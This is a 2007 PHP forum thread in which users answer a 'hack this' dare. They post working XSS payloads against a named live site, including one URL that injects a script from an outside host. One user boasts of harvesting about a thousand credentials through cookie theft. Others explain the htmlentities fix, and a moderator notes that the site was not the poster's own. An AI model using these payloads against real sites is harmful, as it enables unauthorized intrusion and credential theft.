phpSensei Posted November 11, 2007 Share Posted November 11, 2007 I bet you cant.. made it in 5 mins http://www.theinsomniaxe.com/hoast/ Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/ Share on other sites More sharing options...
agentsteal Posted November 11, 2007 Share Posted November 11, 2007 Cross Site Scripting: http://www.theinsomniaxe.com/hoast/index.php/"><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the filename contains code. Cross Site Scripting: There is Cross Site Scripting in the image upload. Full Path Disclosure: Quote Warning: array_sum(): The argument should be an array in /var/www/vhosts/theinsomniaxe.com/httpdocs/hoast/index.php on line 150 Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-389349 Share on other sites More sharing options...
Aureole Posted November 11, 2007 Share Posted November 11, 2007 Haha, sorry but that's just great. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-389352 Share on other sites More sharing options...
phpSensei Posted November 11, 2007 Author Share Posted November 11, 2007 even with that XSS you cant do anything. seriously show me one that would ruin my site. NOTHING!!! Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-389424 Share on other sites More sharing options...
teng84 Posted November 11, 2007 Share Posted November 11, 2007 how do you want us to hack that.. that is only a single page that only upload images ....? Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-389452 Share on other sites More sharing options...
Azu Posted November 12, 2007 Share Posted November 12, 2007 Quote bet you cant.. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-389875 Share on other sites More sharing options...
Lumio Posted November 15, 2007 Share Posted November 15, 2007 Do you really agree that we are allowed to hack your webserver? Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392015 Share on other sites More sharing options...
Zelphics Posted November 15, 2007 Share Posted November 15, 2007 im not sure there is enough php content on this site to make it easily hackable. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392126 Share on other sites More sharing options...
Azu Posted November 15, 2007 Share Posted November 15, 2007 lol? Look up at the top of the thread. He got owned. Still hasn't even fixed any of that ROFL. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392151 Share on other sites More sharing options...
obsidian Posted November 15, 2007 Share Posted November 15, 2007 Quote even with that XSS you cant do anything. seriously show me one that would ruin my site. NOTHING!!! Your wish is my command: http://www.theinsomniaxe.com/hoast/index.php/%22%3E%3Cscript%20type='text/javascript'%20src='http://sandbox.guahanweb.com/scripts/hack.js'%3E%3C/script%3E For me to be able to include a javascript file from my server is insanely dangerous. I could make your site look like anything I wanted it to. What's more, I wouldn't necessarily have to change the functionality of it, I could just add a couple form fields and have the data sent to me instead of you. There are many more dangers to leaving your site open than just having your server hacked. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392156 Share on other sites More sharing options...
thryb Posted November 15, 2007 Share Posted November 15, 2007 ouhahaha Thanks Ob that was H.I.L.A.R.I.O.U.S lolol Seriously, awesome. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392278 Share on other sites More sharing options...
Azu Posted November 15, 2007 Share Posted November 15, 2007 Quote Quote even with that XSS you cant do anything. seriously show me one that would ruin my site. NOTHING!!! Your wish is my command: http://www.theinsomniaxe.com/hoast/index.php/%22%3E%3Cscript%20type='text/javascript'%20src='http://sandbox.guahanweb.com/scripts/hack.js'%3E%3C/script%3E For me to be able to include a javascript file from my server is insanely dangerous. I could make your site look like anything I wanted it to. What's more, I wouldn't necessarily have to change the functionality of it, I could just add a couple form fields and have the data sent to me instead of you. There are many more dangers to leaving your site open than just having your server hacked. Actually you are making it sound rather tame. It can much more dangerous then that. When a pretty short line of code in the wrong place, you could potentially get the username and password of everybody that goes to that page (if you store login data in cookies). I did this once on a site purely as a learning experience to see if I could do it. Got like a thousand usernames/passwords in the few hours I had it on there =O And it doesn't matter if the passwords are hashed, either; you can decrypt them with a rainbow. Exploits like this are very real and very dangerous. And they can be solved by just writing ONE SINGLE WORD INTO YOUR PHP SCRIPT; htmlentities Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392284 Share on other sites More sharing options...
thryb Posted November 15, 2007 Share Posted November 15, 2007 what do you mean by fixed with a single word ? htmlentities Dont you need to parse and replace the chars and stuff ? Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392320 Share on other sites More sharing options...
Azu Posted November 15, 2007 Share Posted November 15, 2007 I mean you just put htmlentities there. Like instead of echo $_GET['input']; You would put echo htmlentities($_GET['input']); That's really all you need to do to make this kind of attack virtually impossible. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392331 Share on other sites More sharing options...
eXeCuTeR Posted November 15, 2007 Share Posted November 15, 2007 In case I found an XSS, what could I possibly do to the website? Could I edit it or access the DB or something? Please give an example to a string the does the same thing. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392342 Share on other sites More sharing options...
thryb Posted November 15, 2007 Share Posted November 15, 2007 Oh didnt know that, and in that case, the xss is made from right after index.php like this one, there is no $_GET really right ? How can you fix it? Sorry I dont wanna bum someone else post but since we're on it Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392350 Share on other sites More sharing options...
thryb Posted November 15, 2007 Share Posted November 15, 2007 I dont think this is an appropriate place to talk about how to hack with XSS there is a lot of doc on xss hacking on the net, just google it. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392352 Share on other sites More sharing options...
eXeCuTeR Posted November 15, 2007 Share Posted November 15, 2007 Quote I dont think this is an appropriate place to talk about how to hack with XSS there is a lot of doc on xss hacking on the net, just google it. Hmm, OK, sorry then I'll google it, thanks. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392356 Share on other sites More sharing options...
Azu Posted November 15, 2007 Share Posted November 15, 2007 Quote Oh didnt know that, and in that case, the xss is made from right after index.php like this one, there is no $_GET really right ? How can you fix it? Sorry I dont wanna bum someone else post but since we're on it I'm not sure what you're trying to ask, sorry. Just use htmlentities on any user-submitted info you output in PHP and you'll be fine. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392366 Share on other sites More sharing options...
phpSensei Posted November 15, 2007 Author Share Posted November 15, 2007 This wasnt even my site, I just wanted to see what professionals can do with XSS... Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392491 Share on other sites More sharing options...
obsidian Posted November 16, 2007 Share Posted November 16, 2007 Quote This wasnt even my site, I just wanted to see what professionals can do with XSS... Then, your post was in direct violation of the forum guidelines. You are not to be posting sites that are not your own for the purpose of having them "tested." Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392535 Share on other sites More sharing options...
gtal3x Posted November 16, 2007 Share Posted November 16, 2007 Quote This wasnt even my site, I just wanted to see what professionals can do with XSS... LOL dident expect that, thats was just stupid.... Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392543 Share on other sites More sharing options...
thryb Posted November 16, 2007 Share Posted November 16, 2007 Thats very smart, if whoever that tested it get reported... never thought about that ?! Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392585 Share on other sites More sharing options...
phpSensei Posted November 16, 2007 Author Share Posted November 16, 2007 I didnt want to get in trouble for hacking it. You think my coding is that sloppy lol? Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392587 Share on other sites More sharing options...
dbo Posted November 16, 2007 Share Posted November 16, 2007 You sound like a 14 year old kid trying to cover up their mistakes. Link to comment https://forums.phpfreaks.com/topic/76889-hack-this/#findComment-392601 Share on other sites More sharing options...
Recommended Posts